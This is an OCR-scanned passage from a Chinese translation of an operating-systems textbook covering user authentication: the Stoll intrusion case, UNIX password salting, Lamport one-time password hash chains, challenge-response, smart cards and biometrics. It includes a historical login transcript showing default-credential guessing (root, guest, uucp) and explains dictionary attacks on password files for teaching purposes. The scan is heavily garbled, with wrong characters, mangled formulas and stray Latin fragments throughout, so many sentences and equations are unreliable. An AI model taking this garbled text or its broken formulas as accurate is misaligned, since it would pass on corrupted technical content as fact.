常 ， 于 是 他 放置 了 一 个 陷阱 程序 来 捕 提 入 侵 者 (Stoll，1989) 。 他 观 
察 到 了 一 个 如 图 9-18 的 入 侵 过 程 一 一 某 个 驴 客 效 入 了 Lawrence Berkeley 
实验 室 (LBL) 并 想 进 入 下 一 个 目标 。 用 于 网 上 交换 的 uucp (UNIX 到 
UNIX 的 COPY 程 序 ) 账号 拥有 超级 用 户 的 权力 ， 这 样 骇 客 可 以 阅 入 系 
统 成 为 美国 能 源 部 计算 机 的 超级 用 户 。 笠 运 的 是 ，LBL 并 不 是 设计 核 
武器 的 实验 室 ， 而 它 在 Livermore 的 姐妹 实验 室 却 的 确 是 设计 核武 器 
的 。 人 们 希望 自己 的 计算 机 系统 更 加 安全 ， 但 当 另 一 家 设计 核武 器 的 
实验 室 Los Alamos 丢 失 了 一 个 装 有 2000 年 机 密 信息 的 硬盘 以 后 ， 大 家 就 
没有 理由 相信 系统 是 安全 的 了 。 


LBL> telnet elxsi 

ELXSI AT LBL 

LOGIN: root 

PASSWORD: root 

INCORRECT PASSWORD, TRY AGAIN 
LOGIN: guest 


PASSWORD: guest 

INCORRECT PASSWORD, TRY AGAIN 

LOGIN: uucp 

PASSWORD: uucp 

WELCOME TO THE ELXSI COMPUTER AT LBL 


图 9-18 骇 客 是 如 何 进入 美国 能 源 部 位 于 LBL 实 验 室 的 计算 机 的 


一 旦 骇 客 同 入 了 系统 并 成 为 超级 用 户 ， 他 束 可 能 安装 一 个 叫做 包 
探测 器 hae sniffer) 的 软件 ， 该 软件 可 以 检查 所 有 在 网 上 进出 的 特 
定 信息 包 。 其 中 之 一 是 查看 哪些 人 从 该 系统 上 远程 登录 到 别 的 计算 机 

， 特 别 是 作为 超级 用 户 登 录 。 这 些 信息 可 以 被 骇 客 隐藏 在 某 一 文件 
下 以 便 内 上 暇 之 余 来 取 。 通 过 这 个 办 法 ， 骇 客 可 以 从 进入 一 个 安全 级 别 
较 低 的 计算 机 入 手 ， 不断 地 阁 入 更 强 安 全 性 能 的 系统 里 。 


目前 越 来 越 多 的 非法 入 侵 都 是 一 些 技术 上 的 生 手 造成 的 ， 他 们 不 
过 是 运行 了 一 些 在 Internet 上 找到 的 脚本 程序 。 这 些 脚本 要 么 使 用 我 们 
上 面 介 绍 的 极端 攻击 ， 要 么 试图 找到 特定 程序 的 bug。 真 正 的 骇 客 认为 
他 们 只 是 些 脚 本 爱好 者 (script kiddy) 。 
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一 个 网 络 攻击 ， 有 些 干 脆 随 机 选取 网 络 地 址 (IP 地 址 的 高 位 ) 看 看 哪 
些 有 反应 。 一 旦 获得 了 一 个 有 效 IP 地 址 的 数据 库 ， 就 可 以 依次 对 计算 
机 进行 攻击 了 。 结 有 果 是 ， 一 台 全 新 的 、 有 安全 保卫 的 军 方 计算 机 ， 刚 
联网 数 小 时 后 就 受到 了 来 自 Intermet 的 攻击 ， 甚 至 除了 系统 管理 员外 还 


没有 多 少 人 知晓 这 人 台 机 器 。 


2.UNIX 口 令 安 全 性 


AE (老式 的 ) 操作 系统 将 口令 文件 以 未 加 密 的 形式 存放 在 磁盘 
里 ， 由 一 般 的 系统 保护 机 制 进行 保护 。 这 样 做 等 于 是 自 找 矿 烦 ， 因 为 
许多 人 都 可 以 访问 该 文件 。 系 统管 理 员 、 操 作 员 、 维 护 人 员 、 程序 
员 、 管 理 人 员 甚 至 有 些 秘书 都 可 以 轻而易举 得 到 。 


在 UNIX 系 统 里 有 一 个 较 好 的 做 法 。 当 用 户 登 录 时 ， 登 录 程 序 首 先 
询问 登录 名 和 口令 。 输 入 的 口令 被 即刻 “加 密 ”， 这 是 通过 将 其 作为 密 
钥 对 某 段 数据 加 密 完 成 的 : 运行 一 个 有 效 的 单 同 男 数 ， 运 行 时 将 口令 
作为 输入 ， 运 行 结果 作为 输出 。 这 一 过 程 并 不 是 真 的 加 密 ， 但 人 们 很 
容易 把 它 叫做 加 密 。 然 后 登录 程序 读 入 加 密 文 件 ， 也 就 是 一 系列 ASCII 
代码 行 ， 每 个 登录 用 望 一行， 直到 找 出 包含 登录 名 的 那 一 行 。 如 琳 这 
行内 (被 加 密 后 的 ) 的 口令 与 刚刚 计算 出 来 的 输入 口令 匹配 ， 就 允许 
登录 ， 否 则 就 拒绝 。 这 种 方法 的 最 大 好 处 是 任何 人 (甚至 古 超级 用 


P) 都 无 法 查看 任何 用 户 的 口令 ， 因 为 口令 文件 并 不 是 以 未 加 密 方式 
在 系统 中 任意 存放 的 。 


然而 ， 这 种 方法 也 可 能 遭 到 攻击 。 骇 客 可 以 甫 先 像 Morris 和 
Thompson 一 样 建立 备 选 口令 的 字典 并 在 空 暇 时 间 用 已 知 算法 加 密 。 这 
一 过 程 无 论 有 多 长 部 无 所 谓 ， 因 为 它们 是 在 进入 系统 前 事先 完成 的 。 
现在 有 了 口令 对 (原始 口令 和 经 过 了 加 密 的 口令 ) 就 可 以 展开 攻击 
了 。 驴 客 读 入 口令 文件 (可 公开 获取 ) ， 抽 取 所 有 加 密 过 的 口令 ， 然 
后 将 其 与 口令 字典 里 的 字符 串 进行 比较 。 每 成 功 一 次 号 获取 了 登录 名 
和 未 加 密 过 的 口令 。 一 个 简单 的 shell 脚 本 可 以 目 动 运行 上 述 操 作 ， 
样 整个 过 程 可 以 在 不 到 一 秒 的 时 间 内 完成 。 这 样 的 脚本 一 次 运行 会 产 
ERT ee 


Morris 和 Thompson 意 识 到 存在 这 种 攻击 的 可 能 性 ， 引 入 了 一 种 几 
乎 使 攻击 毫 无 效果 的 技巧 。 这 一 技巧 是 将 每 一 个 口令 同一 个 叫 
(ith (salt) 的 n 位 随机 数 相 关联 。 无 论 何 时 只 要 口令 改变 ， 随 机 数 就 
改变 。 随 机 数 以 未 加 密 的 方式 存放 在 口令 文件 中 ， 这 样 每 个 人 都 可 以 
读 。 不 再 只 保存 加 密 过 的 口令 ， 而 是 先 将 口令 和 随机 数 连接 起 来 然后 
一 同 加 密 。 加 密 后 的 结果 存放 进口 令 文件 。 如 图 9-19 所 示 ， 一 个 口令 文 
件 里 有 5 个 用 户 : Bobbie、Tony、Laura、Mark 和 Deborah。 每 一 个 用 户 
在 文件 里 分 别 占 一 行 ， 用 逗号 分 解 为 3 个 条 目 ， 登录 名 、 盐 和 (口令 
+ 盐 ) 的 加 密 结 果 。 符 号 e (Dog, 4238) 表示 将 Bobbie 的 口令 Dog 同 他 


AGEL, 423878 nto ei SWZ ° IX —TIAME TE Bobbie# 
目的 第 三 个 域 。 


Bobbie, 4238, e(Dog, 4238) _ 
Tony, 2918, e(6%%TaeFF, 2918) 
Laura, 6902, e(Shakespeare; 6902) 
Mark, 1694, e(XaB # Bwcz , 1694) 
Deborah, 1092, e(LordByron, 1092) 


图 9-19 通过 salt 的 使 用 抵抗 对 已 加 密 口 令 的 先期 运算 


现在 我 们 回顾 一 下 骇 客 非 法 奖 入 计算 机 系统 的 整个 过 程 ， 首先 建 
立 可 能 的 口令 字典 ， 把 它们 加 密 ， 然 后 存放 在 经 过 排序 的 文件 f 中 ， 这 
样 任何 加 密 过 的 口令 都 能 够 被 轻易 找到 。 假 设 入 侵 者 怀疑 Dog 是 一 个 可 
能 的 口令 ， 把 Dog 加 密 后 放 进 文件 f 中 就 不 再 有 效 了 。 骇 客 不 得 不 加 密 
29 个 字符 串 ， 如 Dog0000、Dog0001、Dog0002 等 ， 并 在 文件 f 中 输入 所 
有 知道 的 字符 串 。 这 种 方法 增加 了 2a 倍 的 f 的 计算 量 。 在 UNIX 系 统 
的 该 方法 里 n=12。 


对 附加 的 安全 功能 来 说 ， 有 些 UNIX 的 现代 版 使 口令 不 可 读 但 却 提 
供 了 一 个 程序 可 以 根据 申请 查询 口令 条 目 ， 这 样 做 极 大 地 降低 了 任何 
攻击 者 的 速度 。 对 口令 文件 采用 “加 盐 ” 的 方法 以 及 使 之 不 可 读 (除非 
间接 和 绥 慢 地 读 ) ， 可 以 抵挡 大 多 数 的 外 部 攻击 。 


3 一 次 性 口令 


IRE BO TE AS ARKO -BHP MB 
这 些 忠 告 放 在 心 上 。 更 换 口 令 更 极端 的 方式 是 每 次 登录 换 一 次 口令 ， 
即使 用 一 次 性 口令 。 当 用 户 使 用 一 次 性 口令 时 ， 他 们 会 拿 出 含有 口令 
列表 的 本 子 。 用 户 每 一 次 登录 都 需要 使 用 列表 里 的 后 一 个 口令 。 如 果 
入 侵 者 万 一 发 现 了 口令 ， 对 他 也 没有 任何 好 处 ， 因 为 下 一 次 登录 束 要 
使 用 新 的 口令 。 惧 一 的 建议 是 用 户 必 须 避 免 丢 失 口 令 本 。 


实际 上 ， 使 用 Leslie Lamport 巧 妙 设 计 的 机 制 ， 就 不 再 需要 口令 本 
了 ， 该 机 制 让 用 户 在 并 不 安全 的 网 络 上 使 用 一 次 性 口令 安全 登录 
(Lamport,1981) 。Lamport 的 方法 也 可 以 让 用 户 通过 家 里 的 PC 登录 到 
Internet 服 务 右 ， 即 便 入 侵 者 可 以 看 到 并 日 复制 下 所 有 进出 的 消息 。 而 
且 ， 这 种 方法 无 论 在 服务 器 和 还 是 用 户 PC 的 文件 系统 中 ， 都 不 需要 放 
置 任何 秘密 信息 。 这 种 方法 有 时 候 被 称 为 单 向 散 列 链 (one-way hash 


chain) 。 


上 述 方法 的 算法 基于 单 向 函数 ， 即 y=f(x)。 给 定 x 我 们 很 容易 计算 
出 y， 但 是 给 定 y 却 很 难 计算 出 x。 输 入 和 输入 必须 是 相同 的 长 度 ， 如 
256 位 。 


用 户 选 取 一 个 他 可 以 记 住 的 保密 口令 。 该 用 户 还 要 选择 一 个 整数 
n， 该 整数 确定 了 算法 所 能 够 生成 的 一 次 性 口令 的 数量 。 如 果 ， 考 虑 
n=4， 当 然 实 际 上 所 使 用 的 n 值 要 大 得 多 。 如 采 保 密 口 令 为 s， 那 么 通过 
FA [a] ENT Sen EA 


P, =f(fCECE(S)))) 
第 2 个 口令 用 单 同 画 数 运算 n-1 次 : 


P2 =f(f(f(s))) 


第 3 个 口令 对 { 运 算 2 次 ， 第 4 个 运算 1 次 。 总 之 ，Pi =f(P; )。 要 注意 
的 地 方 是 ， 给 定 任 何 序 列 里 的 口令 ， 我 们 很 容易 计算 出 口令 序列 里 的 
前 一 个 值 ， 但 却 不 可 能 计算 出 后 一 个 值 。 如 ， 给 定 P, 很 容易 计算 出 Pj 
， 但 不 可 能 计算 出 P3。 


口令 服务 器 首先 由 Po 进行 初始 化 ， 即 fP; )。 这 一 值 连同 登录 用 户 
名 和 整数 1 被 存放 在 口令 文件 的 相应 条 目 里 。 整 数 1 表 示 下 一 个 所 需 的 
OSEP 。 当 用 户 第 一 次 登录 时 ， 他 首先 把 自己 的 登录 名 发 送 到 服务 
絮 ， 服 务 句 回复 口令 文件 里 的 整数 值 1。 用 户 机 右 在 本 地 对 所 输入 的 s 
进行 运算 得 到 P| 。 随 后 服务 器 根据 P; 计算 出 fKP; )， 并 将 结果 同 口 令 文 
件 里 的 (Po ) 进 行 比较 。 如 果 符 合 ， 登 录 被 允许 。 这 时 ， 整 数 被 增加 到 
2， 在 口令 文件 中 P; Bit T Po ° 


下 一 次 登录 时 ， 服 务 絮 把 整数 2 发 送 到 用 户 计算 机 ， 用 户 机 器 计算 
出 P。。 然 后 服务 器 计 算 f(P, ) 的 值 并 将 其 与 口令 文件 中 存放 的 值 进行 比 
较 。 如 末 两 者 匹配 ， 束 允许 登录 。 这 时 整数 n 被 增加 到 3， 口 令 文件 中 
HP, mP, 。 这 一 机 制 的 特性 保证 了 即使 入 侵 者 可 以 窃取 Pi; 也 无 法 从 


Pi 计算 出 Pi ， 而 只 能 计算 出 Pi ， 但 Pi 已 经 使 用 过 ， 现 在 失效 了 。 
当 所 有 n 个 口令 都 被 用 完 时 ， 服 务 器 会 重新 初始 化 一 个 密 钥 。 


4. 挑 战 - 啊 应 认证 


男 一 种 口令 机 制 是 让 每 一 个 用 户 提供 一 长 串 问题 并 把 它们 安全 地 
放 在 服务 器 中 (如 可 以 用 加 密 形 式 ) 。 问题 是 用 户 上 自选 的 并 且 不 用 写 
在 纸 上 。 下 面 征 用 户 可 能 选择 的 问题 : 


1) 谁 是 Marjolein 的 姐妹 ? 
2) 你 的 小 学 在 哪 一 条 路 上 ? 


3)Woroboff 女 士 教 什么 课 ? 


在 登录 时 ， 服 务 器 随机 提问 并 验证 答案 。 要 使 这 种 方法 有 效 ， 就 
要 所 供 尽 可 能 多 的 问题 和 管 案 。 


另 一 种 方法 叫做 挑战 - 啊 应 。 使 用 这 种 方法 时 ， 在 登录 为 用 户 时 用 
尸 选 择 某 一 种 运算 ， 例 如 x*。 当 用 户 登 录 时 ， 服 务 器 发 送 给 用 户 一 个 


w 


数 ， 假 设 是 7， 在 这 种 情形 下 ， 用 户 束 输入 49。 这 种 运算 方法 可 以 每 
` 每 天 后 者 从 早 到 晚 经 稼 变化 。 


型 


如 采用 户 的 终端 设备 具有 十 分 强大 的 运算 能 力 ， 如 个 人 计算 机 、 
个 人 数字 助理 或 和 手机， 那么 融 可 以 使 用 更 强大 的 挑战 啊 应 方法 。 过 程 


如 下 : 用 户 事先 选 择 密 钥 k， 并 手工 放置 到 服务 器 中 。 密 钥 的 备份 也 被 
安全 地 存放 在 用 户 的 计算 机 里 。 在 登录 时 ， 服 务 器 把 随机 产生 的 数 r 发 
送 到 用 户 端 ， 由 用 户 端 计算 出 fg 的 值 。 其 中 ， 人 征 一 个 公开 已 知 的 画 
数 。 然 后 ， 服 务 器 也 做 同样 的 运算 看 看 结 末 是否 一 怪 。 这 种 方法 的 优 
点 是 即使 窃听 者 看 到 并 记录 下 双方 通信 的 信息 ， 也 对 他 毫 无 用 处 。 当 
然 ， 函 数 { 需 要 足够 复杂 ， 以 保证 k 不 能 被 逆 推 。 加 密 散 列 函 数 是 不 错 的 
选择 ，r 与 k 的 异 或 值 (XOR) 作为 该 钞 数 的 一 个 参数 。 运 今 为 止 ， 这 
样 的 函数 仍然 被 认为 是 难以 逆 推 的 。 


[1] 在 获得 奥斯卡 奖 的 科幻 电影 《 侏 罗 纪 公园 1》 中， 一 位 名 叫 Dennis 
Nedry 的 计算 机 系统 总 设计 师 暗地里 将 由 计算 机 控制 的 保安 系统 全 部 关 
闭 并 逃离 了 主 控 室 ， 以 便 贸 取 并 市 走 念 龙 的 DNA。 男 一 位 计算 机 技术 
人 员 面 对 混乱 的 系统 ， 对 现场 的 其 他 人 说 ， 由 于 没有 保存 任何 信息 ， 
所 以 要 想 恢 复 保 安 系 统 ， 只 有 一 个 一 个 地 测试 ， 才 能 在 总 共 200 万 个 号 
码 中 将 需要 的 号 码 找 出 来 ， 一 听 是 200 万 个 号 码 ， 在 场 的 人 都 泄 了 气 。 
作者 在 这 里 调 候 了 电影 《 侏 罗 纪 公园 I》 的 创作 者 们 ， 既 然 现 场 计算 机 
系统 还 能 工作 ， 为 什么 不 让 计算 机 去 拨打 这 些 号 码 呢 ! ? 一 一 译 者 注 


9.4.2 ”使 用 实际 物体 的 认证 方式 


用 户 认证 的 第 二 种 方式 验证 一 些 用 户 所 拥有 的 实际 物体 而 不 是 用 
尸 所 知道 的 信息 。 如 金属 钥匙 束 补 使 用 了 好 几 个 世纪 。 现 在 ， 人 们 经 
常 使 用 磁卡 ， 并 把 它 放 入 与 终端 或 计算 机 相连 的 读 卡 器 中 。 而 且 一 上 般 
情况 下 ， 用 户 不 仅 要 揪 卡 ， 还 要 输入 口令 以 保护 别人 冒 用 遗失 或 偷 来 
的 磁卡 。 银 行 的 ATM 机 (ADRAN) 束 采 用 这 种 方法 让 客户 使 用 磁 
卡 和 口令 码 (现在 大 多 数 国家 用 4 位 的 PIN 代 码 ， 这 主要 是 为 了 减少 
ATM 机 安装 计算 机 键盘 的 费用 ) 通过 远程 终端 (ATM 机 ) 登录 到 银行 
NEALE ° 


载 有 信息 的 磁卡 有 两 种 : 人 磁 条 卡 和 心 片 卡 。 磁 条 卡 后 面 烙 附 的 磁 
条 上 可 以 写 入 存放 140 个 字 下 的 信息 。 这 些 信息 可 以 被 终端 读 出 并 发 送 
到 主机 。 一 般 这 些 信息 包括 用 户口 令 (如 PIN 代 码 ) 这 样 终端 即便 在 与 
银行 主机 通信 断 开 的 情况 下 也 可 以 校 验 。 通 肖 ， 用 只 有 银行 已 知 的 密 
钥 对 口令 进行 加 密 。 这 些 卡 片 每 张 成 本 大 约 在 0.1 美 元 到 0.5 美 元 之 间 ， 
价格 差异 主要 取决 于 卡片 前 面 的 全 奶 图 像 和 生产 量 。 在 鉴别 用 户 方 
面 ， 磁 条 卡 有 一 定 的 风险 。 因 为 读 写 卡 的 设备 比较 便宜 并 被 大 量 使 用 
着 。 


而 忌 厂 卡 在 卡片 上 包 售 了 小 型 集成 电路 。 这 种 卡 义 可 以 被 进一步 
分 为 两 类 : 储 值 卡 和 智能 卡 。 储 值 卡 包含 了 一 定数 量 的 存 贮 单元 ( 通 


常 小 于 1KB) ， 它 使 用 ROM 技 术 保 证 数据 在 断 电 和 离开 读 写 设备 后 也 
能 够 保持 记忆 。 不 过 在 卡片 上 没有 CPU， 所 以 被 存储 的 信息 只 有 外 部 
的 CPU ( 读 卡 器 中 ) 才能 改变 。 储 值 卡 被 大 量 生产 ， 使 得 每 张 成 本 可 
以 低 于 1 美元 ， 如 电话 预付 费 卡 等 。 当 人 们 打 电 话 时 ， 卡 里 的 电话 费 被 
扣除 ， 但 实际 上 并 没有 发 生 资 金 的 转移 。 由 于 这 个 原因 ， 这 类 卡 仅仅 
由 一 家 公司 发 售 并 只 能 用 于 一 种 读 卡 器 (如 电话 机 或 自动 售 货 机 ) 。 

当然 也 可 以 存储 1KB 信 息 的 密码 并 通过 读 卡 机 发 送 到 主机 验证 ， 但 很 

少 有 人 这 人 么 做 。 


近来 拥有 更 安全 特性 的 是 智能 卡 。 智 能 卡通 常 使 用 4MHz 8 位 
CPU,16KB ROM,4 KB ROM，512B 可 擦 写 RAM 以 及 9600b/s 与 读 卡 器 之 
间 的 通信 速率 。 这 类 卡 制 作 越 来 越 小 巧 ， 但 各 种 参数 却 不 尽 相 同 。 这 
些 参数 包括 必 片 深度 (AAR ATER AH) ODA REE (SAR Sr 
卡 时 芯片 不 会 受 损 ) 和 成 本 (通常 从 1 美元 到 20 美 元 一 张 不 等 ， 取 决 于 
CPU 功率 、 存 储 大 小 以 及 是 否 有 密码 协 处 理 器 ) 。 


智能 卡 可 用 来 像 储 值 卡 一 样 储 值 ， 但 却 具 有 更 好 的 安全 性 和 更 广 
泛 的 用 途 。 用 户 可 以 在 ATM 机 上 或 通过 银行 提供 的 特殊 读 卡 凑 连 接 到 
主机 取 钱 。 用 户 在 商家 把 卡 插入 读 卡 右 后 ， 可 以 授权 卡片 进行 一 定数 
量 金额 的 转账 〈 输 入 YES 后 ) 。 卡 片 将 一 段 加 密 过 的 信息 发 送 到 商 
家 ， 商 家 稍 后 将 信息 流转 到 银行 扣除 所 付 金额 的 信用 。 


与 信用 卡 或 借 记 卡 相 比 ， 智 能 卡 的 最 大 优点 是 无 须 直接 与 银行 联 
机 操作 。 如 果 读 者 不 相信 这 个 优 息 ， 可 以 笑 试 下 面 的 实验 。 在 两 店 里 
买 一 块 糖果 并 坚持 用 信用 卡 结账 。 如 采 商 家 反对 ， 你 就 说 身边 没有 现 
金 而 且 你 希望 增加 飞行 里 数 趾 。 你 将 发 现 商 家 对 你 的 想法 宫 无 热情 
(因为 使 用 信用 卡 的 相关 成 本 会 使 获得 的 利润 相形 见 纯 ) 。 所 以 ,在 
商店 为 少量 商品 付款 、 付 电话 费 、 停 车 费 、 使 用 自动 售 货 机 以 及 其 他 
许多 需要 使 用 硬币 的 场合 下 ， 智 能 卡 是 十 分 有 用 的 。 在 欧洲 ， 智 能 
被 广泛 使 用 并 逐渐 推广 到 其 他 地 区 。 


智能 卡 有 许多 其 他 的 光 在 用 途 (例如 ， 将 持 卡 人 的 过 敏 反 应 以 及 
其 他 医疗 状况 以 安全 的 方式 编码 ， 供 紧急 时 使 用 ) ， 但 本 书 并 不 是 讲 
故事 的 ， 我 们 的 兴趣 在 于 智能 卡 如 何 用 于 安全 登录 认证 。 其 基本 概念 
很 简单 : 智能 卡 非 浓 小， 卡片 上 有 可 携 市 的 微型 计算 机 与 主机 进行 交 
谈 ( 称 作协 议 ) 并 验证 用 户 身 份 。 如 用 户 想 要 在 电子 商务 网 站 上 买 东 
西 时 ， 可 以 把 智能 卡 插 入 家 里 与 PC 相连 的 读 卡 器 。 电 子 商务 网 站 不 仅 
可 以 比 用 口令 更 安全 地 通过 智能 卡 验证 用 户 身 份 ， 还 可 以 在 卡 上 直接 
扣除 购买 商品 的 金额 ,减少 了 网 站 为 用 户 能 够 使 用 联机 信用 卡 进行 消 
费 而 付出 的 大 量 成 本 〈 以 及 风险 ) 。 


智能 卡 可 以 使 用 不 同 的 验证 机 制 。 一 个 简单 的 挑战 -响应 的 例子 是 
这 样 的 : 首先 服务 器 向 智能 卡 发 出 512 位 随机 数 ， 智 能 卡 接着 将 随机 数 
加 上 存储 在 卡 上 EEPROM 中 的 512 位 用 户口 令 。 然 后 对 所 得 的 和 进行 平 
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Al 9-20 使 用 智能 卡 的 认证 


任何 固定 的 密码 通信 协议 的 缺点 十 容易 在 传输 过 程 中 损坏 ， 从 而 
使 智能 卡 起 失 功 能 。 避 免 这 种 情况 的 一 个 办 法 旦 在 卡片 里 使 用 ROM 而 
不 是 密码 通信 协议 ， 如 Java 解 释 程序 。 然 后 将 用 Java 二 进 制 语言 写成 的 
通信 协议 下 载 到 卡片 中 ， 并 解释 运行 。 通 过 这 种 方法 ， 即 使 协议 被 损 
坏 ， 也 能 够 在 全 球 范 围 内 方便 地 下 载 一 个 新 的 协议 ， 使 得 下 一 次 使 用 
智能 卡 时 ， 该 协议 处 于 完好 的 状态 。 这 种 方法 的 缺点 是 让 本 来 就 速度 
慢 的 智能 卡 更 慢 了 ， 但 是 随 着 技术 的 发 展 这 种 方法 将 被 广泛 使 用 。 智 
能 卡 的 另 一 个 缺点 是 丢失 或 被 盗 的 卡片 可 以 让 不 法 分 子 实施 旁 道 攻击 


(side-channel attack) , UDREA ° eA PAS AU ER 
能 卡 在 执行 加 密 操 作 时 的 电源 功率 损耗 ， 可 以 运用 适当 的 设备 推算 出 
密 钥 。 也 可 以 让 智能 卡 对 特定 的 密 钥 进行 加 密 操作 ， 从 加 蜜 的 时 间 来 
推算 出 卡片 密 钥 的 有 关 信 息 。 


[1] 飞行 里 数 卡 是 信用 卡 的 一 种 ， 通 过 这 类 信用 卡 结账 时 ， 可 以 将 消费 
的 金额 换算 成 航班 的 飞行 里 数 ， 消 费 到 一 定金 额 时 ， 可 能 兑换 免费 机 


票 。 一 译 者 注 


9.4.3 ”使 用 生物 识别 的 验证 方式 


第 三 种 方法 是 对 用 户 的 某 些 物 理 特征 进行 验证 ， 并 且 这 些 特征 很 
难 伪 造 。 这 种 方法 叫做 生物 识别 (Pankanti 等 人 ,2000) 。 如 接 通 在 电 
脑 上 的 指纹 或 声音 识别 恬 可 以 对 用 户 号 份 进行 校 验 。 


一 个 典型 的 生物 识别 系统 由 两 部 分 组 成 : 注册 部 分 和 识别 部 分 。 
在 注册 部 分 中 ， 用 户 的 特征 被 数字 化 储存 ， 并 把 最 重要 的 识别 信息 抽 
取 后 存放 在 用 户 记 录 中 。 存 放 方 式 可 以 是 中 心 数据 库 (如 用 于 远程 计 
算 机 登录 的 数据 库 ) 或 用 户 随身 携带 的 智能 卡 并 在 识别 时 插入 远程 读 
卡 器 (如 ATM 机 ) ° 


另 一 个 部 分 是 识别 部 分 。 在 使 用 时 ， 首 先 由 用 户 输入 登录 名 ， 然 
后 系统 进行 识别 。 如 采 识 别 到 的 信息 与 注册 时 的 样本 信息 相同 ， 则 多 
许 登录 ， 人 否则 天 拒绝 登录 。 这 时 仍然 需要 使 用 登录 名 ， 因 为 仅仅 根据 
仿 济 到 的 识别 信息 来 判断 十 不 严格 的 ， 只 有 识别 部 分 的 信息 会 增加 对 
识别 信息 的 排序 和 检索 难度 。 也 许 某 两 个 人 会 具有 相同 的 生物 特征 ， 
所 以 要 求生 物 特征 还 要 匹配 特定 用 户 喘 份 的 安全 性 比 只 要 求 匹配 一 般 
用 户 的 生物 特征 要 强 得 多 。 


被 选用 的 识别 特征 必须 有 足够 的 可 变性 ， 这 样 系统 可 以 准确 无 误 
地 区 分 大 量 的 用 户 。 例 如 ， 头 发 颜色 吏 不 是 一 个 好 的 特征 ， 因 为 许多 


ARAE FETA AA At ° 而且， 被 选用 的 特征 不 应 该 经 第 发 生变 化 
(对 于 一 些 人 而 言 ， 头 发 并 不 具有 这 个 特性 ) 。 例 如 ， 人 的 声音 由 于 
感冒 会 变化 ， 而 人 的 脸 会 由 于 留 胡 子 或 化 妆 而 与 注册 时 的 样本 不 同 。 
既然 样本 信息 永远 也 不 会 与 以 后 识别 到 的 信息 完全 符合 ， 那 么 系统 设 
计 人 员 束 要 决定 识别 的 精度 有 多 大 。 在 极端 情况 下 ， 设 计 人 员 必 须 考 
虑 系统 也 许 不 得 不 偶尔 拒绝 一 个 合法 用 户 ， 但 恰巧 让 一 个 乔 痛 打扮 着 
进入 系统 。 对 电子 商务 网 站 来 说 ， 拒 绝 一 名 合法 用 户 比 遭 受 一 小 部 分 
诈骗 的 损失 要 严重 得 多 ; 而 对 核武 絮 网 站 来 说 ， 拒 绝 正式 员工 的 到 访 
比 让 阳 生 人 一 年 进入 几 回 要 好 得 多 。 


现在 让 我 们 来 看 一 看 实际 应 用 的 一 些 生物 识别 方式 。 一 个 令 人 有 
些 惊奇 的 方式 是 使 用 手指 长 短 进 行 识别 。 在 使 用 该 方法 时 ， 每 一 个 终 
端 都 有 如 图 9-21 所 示 的 痛 置 。 用 户 把 手 插 进 闻 置 里 ， 系 统 驶 会 对 于 指 
的 长 短 进行 测量 并 与 数据 库 里 的 样本 进行 核对 。 


Al 9-21 一 种 测量 手指 长 度 的 装置 


然而 ， 手 指 长 度 识别 并 不 是 令 人 满意 的 方式 。 系 统 可 能 遭受 手指 
石膏 模型 或 其 他 仿制 品 的 攻击 ， 也 许 入 侵 者 还 可 以 调节 手指 的 长 度 以 
便 进 行 实验 。 


另 一 种 目前 被 广泛 应 用 于 商业 的 生物 识别 模式 年 虹膜 识 别 技术 。 
任何 两 个 人 都 具有 不 同 的 视网膜 组 织 血 管 (patterns) ， 即 使 是 同 卵 双 
胞 胎 也 不 例外 ， 因 此 虹膜 识别 与 指纹 识别 同样 可 靠 ， 而 且 更 加 容易 实 
现 自动 化 (Daugman,2004) 。 用 户 的 视网膜 可 以 由 一 米 以 外 的 照相 机 
拍照 并 通过 gabor 小 波 (gabor wavelet) 变换 的 方式 提取 某 些 特征 信 


尽 ， 并 且 将 结果 压缩 为 256 字 节 。 该 结果 在 用 户 登 录 的 时 候 与 现场 采样 
结 采 进 行 比较 ， 如 果 两 者 的 汉 明 距离 (hamming distance) IFEA 
值 ， 则 该 用 户 通 过 验证 〈 两 个 比特 字 串 之 闻 的 汉 明 距离 指 从 一 个 比特 
串 变 换 为 另 一 个 比特 串 最 少 需要 变化 的 比特 数 ) 。 


任何 依靠 岁 像 进行 识别 的 技术 都 有 可 能 被 假冒 。 例 如 ， 茶 人 可 以 
戴 上 秋 镜 徘 近 ATM 机 前 的 照相 机 ， 墨 镜 上 贴 厦 别人 的 视网膜 。 毕 竟 ， 
如 果 ATM 机 的 照相 机 可 以 在 1 米 距 离 招 摄 视网膜 照片 ， 那 么 其 他 人 也 
可 以 这 么 做 ， 长 至 长 距离 地 使 用 镜头 。 出 于 这 个 原因 ， 还 必须 采取 一 
些 人 额外 的 对 策 ， 例 如 在 照相 的 时 候 使 用 内 光 灯 一 一 并 不 是 为 了 增加 光 
的 强度 ， 而 是 为 了 观察 拍摄 到 的 瞳孔 是 否 会 在 强 光 下 收缩 ， 或 用 于 确 
定 所 担 摄 到 的 瞳孔 是 否 是 摄影 初学 者 的 拙 作 (此 时 红眼 效应 会 在 内 交 
灯 下 出 现 ， 然 而 当 关 闭 内 光 灯 后 ， 则 看 不 到 红眼 ) 。 阿 姆 斯 特 丹 机 场 
从 2001 年 起 就 开始 使 用 虹膜 识别 技术 以 便 使 得 经 肖 出 入 机 场 的 常客 得 
以 跳 过 常规 安检 流程 。 


还 有 一 种 技术 叫做 签名 分 析 。 用 户 使 用 一 种 特殊 的 笔 签名 ， 笔 与 
终端 相连 。 计 算 机 将 签名 与 在 线 存放 的 或 智能 卡 里 的 已 知 样 本 进行 比 
较 。 更 好 的 一 种 办 法 是 不 去 比较 签名 ， 而 是 比较 笔 的 移动 轨迹 及 书写 
签名 时 产生 的 压力 。 一 个 好 的 仿造 者 也 许 能 够 复制 签名 ， 但 对 笔画 顺 
序 和 书写 的 压力 与 速度 却 毫 无 办 法 。 


还 有 一 种 依靠 迷你 装置 识别 的 技术 是 声 首 测 定 
(Markowitz,2000) 。 整 个 装置 只 需要 一 个 麦克 风 (或 者 甚至 是 一 部 
电话 ) 和 有 关 的 软件 即 可 。 声 音 测定 技术 与 声音 识别 技术 不 同 。 后 者 
是 为 了 识别 人 们 说 了 些 什么 ， 而 前 者 是 为 了 判断 人 们 的 身份 。 有 些 系 
统 仅仅 要 求 用 户 说 一 句 密 码 ， 但 是 窃听 者 可 以 把 这 句 话 孙 下 来 ， 通 过 
回放 来 进入 系统 。 更 先进 的 系统 向 用 户 说 一 些 话 并 要 求 重 述 ， 用 户 每 
次 登录 叙述 的 都 是 不 同 的 语句 。 有 些 公司 开始 在 软件 中 使 用 声音 测定 
技术 ， 如 通过 电话 线 连接 使 用 的 家 庭 购 物 软件 。 在 这 种 情况 下 ， 声 音 
测定 比 用 PIN 密码 要 安全 得 多 


